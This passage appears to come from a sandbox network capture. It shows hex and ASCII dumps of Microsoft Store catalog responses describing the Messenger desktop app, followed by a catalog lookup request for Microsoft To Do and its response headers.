                                                                                                                                                                                    2023-01-05 07:59:16 UTC15492INData Raw: 6e 64 73 20 75 70 20 74 6f 20 73 70 65 65 64 2e 20 52 65 63 65 69 76 65 20 66 69 6c 65 73 20 66 6f 72 20 65 76 65 6e 20 6d 6f 72 65 20 70 72 6f 64 75 63 74 69 76 69 74 79 2e 5c 72 5c 6e 5c 72 5c 6e 5c 72 5c 6e 2a 43 61 6c 6c 73 20 61 72 65 20 66 72 65 65 20 6f 76 65 72 20 57 69 2d 46 69 20 62 75 74 20 6f 74 68 65 72 77 69 73 65 20 73 74 61 6e 64 61 72 64 20 64 61 74 61 20 63 68 61 72 67 65 73 20 61 70 70 6c 79 2e 5c 72 5c 6e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 61 62 6f 75 74 2f 70 72 69 76 61 63 79 20 7c 20 4c 45 41 52 4e 20 4d 4f 52 45 20 61 74 3a 20 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 20 28 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72
                                                                                                                                                                                    Data Ascii: nds up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15493INData Raw: 47 4e 22 2c 22 47 57 22 2c 22 47 59 22 2c 22 48 54 22 2c 22 48 4d 22 2c 22 48 4e 22 2c 22 41 5a 22 2c 22 42 53 22 2c 22 42 42 22 2c 22 42 59 22 2c 22 42 5a 22 2c 22 42 4a 22 2c 22 42 4d 22 2c 22 42 54 22 2c 22 4b 4d 22 2c 22 43 47 22 2c 22 43 44 22 2c 22 43 4b 22 2c 22 43 58 22 2c 22 43 43 22 2c 22 43 49 22 2c 22 43 57 22 2c 22 4a 4d 22 2c 22 53 4a 22 2c 22 4a 45 22 2c 22 4b 49 22 2c 22 4b 47 22 2c 22 4c 41 22 2c 22 4c 53 22 2c 22 4c 52 22 2c 22 4d 4f 22 2c 22 4d 4b 22 2c 22 4d 47 22 2c 22 4d 57 22 2c 22 49 4d 22 2c 22 4d 48 22 2c 22 4d 51 22 2c 22 4d 55 22 2c 22 59 54 22 2c 22 46 4d 22 2c 22 4d 44 22 2c 22 4d 4e 22 2c 22 4d 53 22 2c 22 4d 5a 22 2c 22 4d 4d 22 2c 22 4e 41 22 2c 22 4e 52 22 2c 22 4e 50 22 2c 22 4d 56 22 2c 22 4d 4c 22 2c 22 4e 43 22 2c 22
                                                                                                                                                                                    Data Ascii: GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15494INData Raw: 64 22 2c 22 56 61 6c 75 65 22 3a 22 63 36 61 39 66 61 35 63 2d 32 30 61 32 2d 34 65 31 32 2d 39 30 34 64 2d 65 64 64 34 30 38 36 35 37 64 63 38 22 7d 2c 7b 22 49 64 54 79 70 65 22 3a 22 4c 65 67 61 63 79 57 69 6e 64 6f 77 73 50 68 6f 6e 65 50 72 6f 64 75 63 74 49 64 22 2c 22 56 61 6c 75 65 22 3a 22 33 32 31 39 64 33 30 64 2d 34 61 32 33 2d 34 66 35 38 2d 61 39 31 63 2d 63 34 34 62 30 34 65 36 61 30 63 37 22 7d 2c 7b 22 49 64 54 79 70 65 22 3a 22 58 62 6f 78 54 69 74 6c 65 49 64 22 2c 22 56 61 6c 75 65 22 3a 22 32 30 30 34 32 30 38 37 32 38 22 7d 5d 2c 22 49 6e 67 65 73 74 69 6f 6e 53 6f 75 72 63 65 22 3a 22 44 43 45 22 2c 22 49 73 4d 69 63 72 6f 73 6f 66 74 50 72 6f 64 75 63 74 22 3a 66 61 6c 73 65 2c 22 50 72 65 66 65 72 72 65 64 53 6b 75 49 64 22 3a 22
                                                                                                                                                                                    Data Ascii: d","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15495INData Raw: 49 4d 45 20 49 4e 20 48 49 47 48 2d 51 55 41 4c 49 54 59 5c 72 5c 6e 48 6f 73 74 20 6f 6e 65 2d 6f 6e 2d 6f 6e 65 20 6d 65 65 74 69 6e 67 73 20 6f 72 20 62 72 69 6e 67 20 74 68 65 20 77 68 6f 6c 65 20 67 72 6f 75 70 20 74 6f 67 65 74 68 65 72 20 77 69 74 68 20 66 72 65 65 2a 2c 20 68 69 67 68 2d 71 75 61 6c 69 74 79 20 76 6f 69 63 65 20 61 6e 64 20 76 69 64 65 6f 20 63 68 61 74 20 66 65 61 74 75 72 65 73 2e 5c 72 5c 6e 5c 72 5c 6e 47 45 54 20 54 48 45 20 47 52 4f 55 50 20 54 4f 47 45 54 48 45 52 20 57 49 54 48 20 52 4f 4f 4d 53 5c 72 5c 6e 53 65 6e 64 20 61 20 6c 69 6e 6b 20 74 6f 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 20 77 69 74 68 20 61 6e 79 6f 6e 65 2c 20 65 76 65 6e 20 69 66 20 74 68 65 79 20 64 6f 6e 27 74 20 68 61 76 65 20 4d 65 73 73
                                                                                                                                                                                    Data Ascii: IME IN HIGH-QUALITY\r\nHost one-on-one meetings or bring the whole group together with free*, high-quality voice and video chat features.\r\n\r\nGET THE GROUP TOGETHER WITH ROOMS\r\nSend a link to group video chat with anyone, even if they don't have Mess
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15496INData Raw: 2c 22 42 45 22 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43 59 22 2c 22 43 5a 22 2c 22 44 4b 22 2c 22 45 47 22 2c 22 45 45 22 2c 22 46 49 22 2c 22 46 52 22 2c 22 44 45 22 2c 22 47 52 22 2c 22 47 54 22 2c 22 48 4b 22 2c 22 48 55 22 2c 22 49 53 22 2c 22 49 4e 22 2c 22 49 44 22 2c 22 49 51 22 2c 22 49 45 22 2c 22 49 4c 22 2c 22 49 54 22 2c 22 4a 50 22 2c 22 4a 4f 22 2c 22 4b 5a 22 2c 22 4b 45 22 2c 22 4b 57 22 2c 22 4c 56 22 2c 22 4c 42 22 2c 22 4c 49 22 2c 22 4c 54 22 2c 22 4c 55 22 2c 22 4d 59 22 2c 22 4d 54 22 2c 22 4d 52 22 2c 22 4d 58 22 2c 22 4d 41 22 2c 22 4e 4c 22 2c 22 4e 5a 22 2c 22 4e 47 22 2c 22 4e 4f 22 2c 22 4f 4d 22 2c 22 50 4b 22 2c 22 50 45 22 2c 22 50 48 22
                                                                                                                                                                                    Data Ascii: ,"BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH"
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15497INData Raw: 22 2c 22 53 48 22 2c 22 4b 4e 22 2c 22 4c 43 22 2c 22 50 4d 22 2c 22 56 43 22 2c 22 54 4a 22 2c 22 54 5a 22 2c 22 54 47 22 2c 22 54 4b 22 2c 22 54 4f 22 2c 22 54 4d 22 2c 22 54 43 22 2c 22 54 56 22 2c 22 55 4d 22 2c 22 55 47 22 2c 22 56 49 22 2c 22 56 47 22 2c 22 57 46 22 2c 22 45 48 22 2c 22 5a 4d 22 2c 22 5a 57 22 2c 22 55 5a 22 2c 22 56 55 22 2c 22 53 52 22 2c 22 53 5a 22 2c 22 41 44 22 2c 22 4d 43 22 2c 22 53 4d 22 2c 22 4d 45 22 2c 22 56 41 22 2c 22 4e 45 55 54 52 41 4c 22 5d 7d 5d 2c 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 57 5a 44 4e 43 52 46 30 30 38 33 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 57 5a 44 4e 43 52 46 30 30 38 33 22 2c 22 57 75
                                                                                                                                                                                    Data Ascii: ","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9WZDNCRF0083","Properties":{"FulfillmentData":{"ProductId":"9WZDNCRF0083","Wu
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15498INData Raw: 30 31 35 30 34 33 30 37 32 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 30 39 37 30 34 37 38 35 39 32 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 46 41 43 45 42 4f 4f 4b 2e 33 31 37 31 38 30 42 30 42 42 34 38 36 5f 31 37 32 30 2e 32 38 2e 32 31 35 2e 30 5f 78 36 34 5f 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74
                                                                                                                                                                                    Data Ascii: 015043072,"MinVersion":2814750970478592,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"FACEBOOK.317180B0BB486_1720.28.215.0_x64__8xx8rvfyw5nnt\",\"content
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15499INData Raw: 43 61 74 65 67 6f 72 79 49 64 22 3a 22 63 36 61 39 66 61 35 63 2d 32 30 61 32 2d 34 65 31 32 2d 39 30 34 64 2d 65 64 64 34 30 38 36 35 37 64 63 38 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 33 31 37 31 38 30 42 30 42 42 34 38 36 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64 53 6b 75 73 22 3a 5b 5d 2c 22 49 73 52 65 70 75 72 63 68 61 73 61 62 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 53 6b 75 41 53 63 68 65 6d 61 22 3a 22 53 6b 75 3b 33 22 2c 22 53 6b 75 42 53 63 68 65 6d 61 22 3a 22 53 6b 75 55 6e 69 66 69 65 64 41 70
                                                                                                                                                                                    Data Ascii: CategoryId":"c6a9fa5c-20a2-4e12-904d-edd408657dc8","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","SkuId":"0010","Content":null,"PackageFeatures":null}}],"BundledSkus":[],"IsRepurchasable":false},"SkuASchema":"Sku;3","SkuBSchema":"SkuUnifiedAp
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15500INData Raw: 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 54 61 78 65 73 4e 6f 74 49 6e 63 6c 75 64 65 64 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 4f 72 69 67 69 6e 61 6c 52 65 6c 65 61 73 65 44 61 74 65 22 3a 22 32 30 31 34 2d 30 33 2d 30 35 54 30 30 3a 30 31 3a 30 30 2e 38 34 37 30 30 30 30 5a 22 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 30 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c
                                                                                                                                                                                    Data Ascii: e":{"CurrencyCode":"USD","IsPIRequired":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"TaxesNotIncluded","WholesaleCurrencyCode":""}},"Properties":{"OriginalReleaseDate":"2014-03-05T00:01:00.8470000Z"},"SkuId":"0010","DisplayRank":0,"RemediationRequired":fal
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15501INData Raw: 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a 39 57 5a 44 4e 43 52 46 30 30 38 33 3a 30 30 31 30 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 77 65 73 3a 41 70 70 3a 33 32 31 39 64 33 30 64 2d 34 61 32 33 2d 34 66 35 38 2d 61 39 31 63 2d 63 34 34 62 30 34 65 36 61 30 63 37 3a 46 75 6c 6c 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 77 65 73 3a 41 70 70 3a 63 36 61 39 66 61 35 63 2d 32 30 61 32 2d 34 65 31 32 2d 39 30 34 64 2d 65 64 64 34 30 38 36 35 37 64 63 38 3a 46 75 6c 6c 22 5d 2c 22 4c
                                                                                                                                                                                    Data Ascii: ementKeys":[{"EntitlementKeys":["big:9WZDNCRF0083:0010"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["wes:App:3219d30d-4a23-4f58-a91c-c44b04e6a0c7:Full"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["wes:App:c6a9fa5c-20a2-4e12-904d-edd408657dc8:Full"],"L
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15502INData Raw: 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 38 38 32 38 30 38 30 22 7d 5d 7d 2c 22 45 6e 64 44 61 74 65 22 3a 22 39 39 39 38 2d 31 32 2d 33 30 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 2c 22 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31 37 35 33 2d 30 31 2d 30 31 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 7d 2c 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 33 2d 30 31 2d 30 33 54 31 37 3a 30 30 3a 35 39 2e 34 38 32 38 38 31 35 5a 22 2c 22 4c 69 63 65 6e 73 69 6e 67 44 61 74 61 22 3a 7b 22 53 61 74 69 73 66 79 69 6e 67 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a
                                                                                                                                                                                    Data Ascii: ame":"Windows.8828080"}]},"EndDate":"9998-12-30T00:00:00.0000000Z","ResourceSetIds":["1"],"StartDate":"1753-01-01T00:00:00.0000000Z"},"LastModifiedDate":"2023-01-03T17:00:59.4828815Z","LicensingData":{"SatisfyingEntitlementKeys":[{"EntitlementKeys":["big:
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15503INData Raw: 20 61 6e 64 20 63 6c 6f 73 65 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 2e 20 47 65 74 20 61 63 63 65 73 73 20 74 6f 20 66 72 65 65 2a 20 74 65 78 74 69 6e 67 2c 20 61 6e 64 20 68 69 67 68 2d 71 75 61 6c 69 74 79 20 76 6f 69 63 65 20 26 20 76 69 64 65 6f 20 63 68 61 74 20 62 75 69 6c 74 20 73 70 65 63 69 66 69 63 61 6c 6c 79 20 66 6f 72 20 64 65 73 6b 74 6f 70 2e 5c 72 5c 6e 5c 72 5c 6e 4d 41 44 45 20 46 4f 52 20 44 45 53 4b 54 4f 50 2c 20 4d 41 44 45 20 46 4f 52 20 59 4f 55 5c 72 5c 6e 54 79 70 65 20 65 76 65 6e 20 66 61 73 74 65 72 2c 20 6d 75 6c 74 69 74 61 73 6b 20 77 68 69 6c 65 20 76 69 64 65 6f 20 63 68 61 74 74 69 6e 67 20 73 6f 20 79 6f 75 20 6e 65 76 65 72 20 6d 69 73 73 20 61 20 6d 6f 6d 65 6e 74 2c 20 61 6e 64 20 73 74 61 79 20 63 6f 6e 6e 65 63 74
                                                                                                                                                                                    Data Ascii: and close connections. Get access to free* texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE FOR YOU\r\nType even faster, multitask while video chatting so you never miss a moment, and stay connect
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15504INData Raw: 72 65 20 70 72 6f 64 75 63 74 69 76 69 74 79 2e 5c 72 5c 6e 5c 72 5c 6e 5c 72 5c 6e 2a 43 61 6c 6c 73 20 61 72 65 20 66 72 65 65 20 6f 76 65 72 20 57 69 2d 46 69 20 62 75 74 20 6f 74 68 65 72 77 69 73 65 20 73 74 61 6e 64 61 72 64 20 64 61 74 61 20 63 68 61 72 67 65 73 20 61 70 70 6c 79 2e 5c 72 5c 6e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 61 62 6f 75 74 2f 70 72 69 76 61 63 79 20 7c 20 4c 45 41 52 4e 20 4d 4f 52 45 20 61 74 3a 20 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 20 28 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 29 22 2c 22 53 6b 75 54 69 74 6c 65 22 3a 22 4d 65 73 73 65 6e 67 65 72 22 2c 22 4c 61 6e 67 75 61 67 65 22 3a
                                                                                                                                                                                    Data Ascii: re productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy | LEARN MORE at: https://messenger.com (https://messenger.com/)","SkuTitle":"Messenger","Language":
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15505INData Raw: 22 42 54 22 2c 22 4b 4d 22 2c 22 43 47 22 2c 22 43 44 22 2c 22 43 4b 22 2c 22 43 58 22 2c 22 43 43 22 2c 22 43 49 22 2c 22 43 57 22 2c 22 4a 4d 22 2c 22 53 4a 22 2c 22 4a 45 22 2c 22 4b 49 22 2c 22 4b 47 22 2c 22 4c 41 22 2c 22 4c 53 22 2c 22 4c 52 22 2c 22 4d 4f 22 2c 22 4d 4b 22 2c 22 4d 47 22 2c 22 4d 57 22 2c 22 49 4d 22 2c 22 4d 48 22 2c 22 4d 51 22 2c 22 4d 55 22 2c 22 59 54 22 2c 22 46 4d 22 2c 22 4d 44 22 2c 22 4d 4e 22 2c 22 4d 53 22 2c 22 4d 5a 22 2c 22 4d 4d 22 2c 22 4e 41 22 2c 22 4e 52 22 2c 22 4e 50 22 2c 22 4d 56 22 2c 22 4d 4c 22 2c 22 4e 43 22 2c 22 4e 49 22 2c 22 4e 45 22 2c 22 4e 55 22 2c 22 4e 46 22 2c 22 50 57 22 2c 22 50 53 22 2c 22 50 41 22 2c 22 50 47 22 2c 22 50 59 22 2c 22 52 45 22 2c 22 52 57 22 2c 22 42 4c 22 2c 22 4d 46 22 2c
                                                                                                                                                                                    Data Ascii: "BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF",
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15506INData Raw: 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 41 70 70 78 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 33 31 37 31 38 30 42 30 42 42 34 38 36 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 46 41 43 45 42 4f 4f 4b 2e 33 31 37 31 38 30 42 30 42 42 34 38 36 5f 31 37 32 30 2e 32 38 2e 32 31 35 2e 30 5f 78 36 34 5f 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 36 66 31 33 37 35 37 38 2d 34 36 36 62 2d 65 66 64 65 2d 31 32 62 63 2d 64 34 63 37 64 66 63 65 61 34 37 34 2d 58 36 34 22 2c 22 50 61 63 6b 61 67 65 52 61 6e
                                                                                                                                                                                    Data Ascii: kageFormat":"Appx","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","MainPackageFamilyNameForDlc":null,"PackageFullName":"FACEBOOK.317180B0BB486_1720.28.215.0_x64__8xx8rvfyw5nnt","PackageId":"6f137578-466b-efde-12bc-d4c7dfcea474-X64","PackageRan
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15507INData Raw: 5c 22 3a 38 31 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 34 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 32 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 32 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 39 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 38 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 35 34 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d 7d 7d 22 2c 22 50 61 63 6b 61 67 65 44 6f 77 6e 6c 6f 61 64 55 72 69 73 22 3a 6e 75 6c 6c 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 57 5a 44 4e 43 52 46 30 30 38 33 22 2c 22 57
                                                                                                                                                                                    Data Ascii: \":81,\"systemId\":5},{\"level\":48,\"systemId\":12},{\"level\":27,\"systemId\":9},{\"level\":78,\"systemId\":16},{\"level\":68,\"systemId\":15},{\"level\":54,\"systemId\":13}]}}","PackageDownloadUris":null,"FulfillmentData":{"ProductId":"9WZDNCRF0083","W
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15508INData Raw: 39 38 2d 31 32 2d 33 30 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 2c 22 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31 37 35 33 2d 30 31 2d 30 31 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 7d 2c 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 33 2d 30 31 2d 30 33 54 31 37 3a 30 30 3a 35 39 2e 34 38 32 38 38 31 35 5a 22 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 5d 2c 22 4f 72 64 65 72 4d 61 6e 61 67 65 6d 65 6e 74 44 61 74 61 22 3a 7b 22 47 72 61 6e 74 65 64 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 5d 2c 22 50 72 69 63 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65
                                                                                                                                                                                    Data Ascii: 98-12-30T00:00:00.0000000Z","ResourceSetIds":["1"],"StartDate":"1753-01-01T00:00:00.0000000Z"},"LastModifiedDate":"2023-01-03T17:00:59.4828815Z","Markets":["US"],"OrderManagementData":{"GrantedEntitlementKeys":[],"Price":{"CurrencyCode":"USD","IsPIRequire
                                                                                                                                                                                    2023-01-05 07:59:16 UTC15509INData Raw: 52 65 73 6f 75 72 63 65 53 65 74 49 64 73 22 3a 5b 22 31 22 5d 2c 22 53 74 61 72 74 44 61 74 65 22 3a 22 31 37 35 33 2d 30 31 2d 30 31 54 30 30 3a 30 30 3a 30 30 2e 30 30 30 30 30 30 30 5a 22 7d 2c 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 33 2d 30 31 2d 30 33 54 31 37 3a 30 30 3a 35 39 2e 34 38 32 38 38 31 35 5a 22 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 5d 2c 22 4f 72 64 65 72 4d 61 6e 61 67 65 6d 65 6e 74 44 61 74 61 22 3a 7b 22 47 72 61 6e 74 65 64 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 5d 2c 22 50 72 69 63 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52
                                                                                                                                                                                    Data Ascii: ResourceSetIds":["1"],"StartDate":"1753-01-01T00:00:00.0000000Z"},"LastModifiedDate":"2023-01-03T17:00:59.4828815Z","Markets":["US"],"OrderManagementData":{"GrantedEntitlementKeys":[],"Price":{"CurrencyCode":"USD","IsPIRequired":false,"ListPrice":0.0,"MSR


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    59192.168.2.44993720.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15509OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Microsoft.Todos_8wekyb3d8bbwe&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: bnO7ppOXOE6m9K13.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:17 UTC15510INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 43013
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:17 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: a6693beb-a209-4a46-a9ca-2faddc34c5bf
                                                                                                                                                                                    MS-RequestId: facaec31-4933-4a47-a53d-d40dc773d835
                                                                                                                                                                                    MS-CV: bnO7ppOXOE6m9K13.0.2.4.4008885901.1980146829.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: b4ddc6-grj6l
                                                                                                                                                                                    MS-DocumentVersions: 9NBLGGH5R558|5652
